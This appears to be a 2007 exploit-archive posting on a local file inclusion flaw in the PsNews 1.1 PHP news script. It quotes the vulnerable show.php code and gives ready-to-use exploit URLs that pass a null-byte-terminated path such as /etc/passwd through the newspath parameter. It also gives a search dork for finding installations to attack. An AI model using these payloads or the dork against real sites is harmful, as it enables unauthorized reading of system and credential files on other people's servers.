PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability
# Published : 2007-07-12
# Author : irk4z
# Previous Title : paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability
# Next Title : Php Blue Dragon CMS 3.0.0 Remote Code Execution Exploit

#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.        #
#                                                                              #
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion                   #
# author: irk4z@yahoo.pl                                                       #
# download:                                                                    #
#   http://www.strefaphp.net/index.php?page=download&what=download&fid=12      #
# dork: "Powered by PsNews" ;]                                                 #

/news/show.php:
...
 if(eregi("://", $newspath)){
 	die("Nieautoryzowany dost??p!");
 }
 if(!isset($newspath)){
	 $newspath = "news";
 }
 include("$newspath/functions.php");
...

# exploit:

 http://[site]/[path]/news/show.php?newspath=/etc/passwd%00
 http://[site]/[path]/news/show.php?newspath=[file]%00


# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*

# www.Syue.com [2007-07-12]